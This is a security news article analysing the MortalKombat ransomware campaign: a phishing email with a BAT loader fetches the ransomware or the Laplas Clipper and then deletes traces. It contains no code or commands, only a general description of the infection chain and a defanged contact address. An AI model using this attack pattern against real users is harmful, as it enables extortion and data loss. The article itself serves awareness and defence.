MortalKombat Ransomware

Since December 2022, an unidentified threat actor has been using two relatively new threatening programs - the MortalKombat Ransomware and a GO variant of the Laplas Clipper malware - to collect cryptocurrency from their victims. The attacker has been scanning the Internet for vulnerable machines with an exposed remote desktop protocol (RDP) port 3389, which they then use to gain unauthorized access to the victim's system. To facilitate this attack, the attacker used one of their download servers, which also hosts the MortalKombat Ransomware. Details about the utilized malware tools and the attack campaign were released in a report by malware researchers.

Upon analyzing the code, class name, and Registry key strings of the MortalKombat Ransomware, the researchers concluded with high confidence that the threat belongs to the Xorist family of ransomware. This ransomware strain is known for using strong encryption algorithms to encrypt the victim's files and then asking for a ransom payment in exchange for the decryption key.

The Multi-Stage Infection Chain Deploying the MortalKombat Ransomware

The attack campaign typically begins with a phishing email. The attackers usually deliver either malware or ransomware through the email and then proceed to cover their tracks by deleting any evidence of the corrupted files. This makes it difficult for infosec researchers to analyze the operation.

The initial phishing email contains a compromised ZIP file that has a BAT loader script. The lure email is presented as if coming from the legitimate global cryptocurrency gateway CoinPayments. Of course, the entity is in no way connected to these email messages.
Additionally, to further fool their targets, the emails have a spoofed sender email.

When the victim opens the loader script, it automatically downloads another malicious ZIP file from an attacker-controlled hosting server onto the victim's machine. The script then inflates the file and executes the payload. The payload can either be the GO variant of Laplas Clipper malwa or the MortalKombat Ransomware.

The loader script runs the deployed payload as a process on the victim's machine and then removes any downloaded and dropped unsafe files to eliminate infection markers.

The Threatening Capabilities of the MortalKombat Ransomware

Little is known about the MortalKombat Ransomware creators or their operational strategy. Both the name of the ransomware and the wallpaper that it drops on the victim's system is a nod to the popular Mortal Kombat media franchise, which includes a series of video games and movies.

MortalKombat has the ability to encrypt a wide range of files on the victim's machine, including system, application, database, backup, virtual machine files, as well as files on remote locations mapped as logical drives. It drops a ransom note and changes the wallpaper on the victim's machine after encrypting the files. However, MortalKombat does not display any wiper behavior or delete the Shadow Volume Copies on the victim's machine. Instead, it corrupts the Windows Explorer, removes folders and applications from the Windows startup, and disables the Run command window, rendering the machine inoperable.

The cybercriminals behind the threat use qTOX, a popular instant messaging application available on GitHub, to communicate with their victims. Additionally, they provide an email address - 'hack3dlikeapro[at]proton[.]me,' as an alternative means of communication.

Overall, MortalKombat is a highly threatening ransomware that can cause severe damage to victims' machines and result in the loss of valuable data. You should remain vigilant against such threats and take proactive measures to secure systems against ransomware attacks.